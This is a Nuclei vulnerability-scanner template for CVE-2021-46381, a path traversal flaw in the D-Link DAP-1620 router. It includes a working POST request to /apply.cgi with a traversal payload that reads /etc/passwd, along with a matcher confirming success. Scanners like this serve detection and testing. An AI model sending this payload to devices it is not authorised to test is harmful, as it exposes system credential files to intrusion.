nuclei-templates/cves/2021/CVE-2021-46381.yaml

31 lines
1.1 KiB
YAML

id: CVE-2021-46381
info:
name: D-Link DAP-1620 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
reference:
- https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
- https://www.cvedetails.com/cve/CVE-2021-46381/
- https://www.dlink.com/en/security-bulletin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-46381
cwe-id: CWE-22
tags: cve,cve2021,dlink,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/apply.cgi"
body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"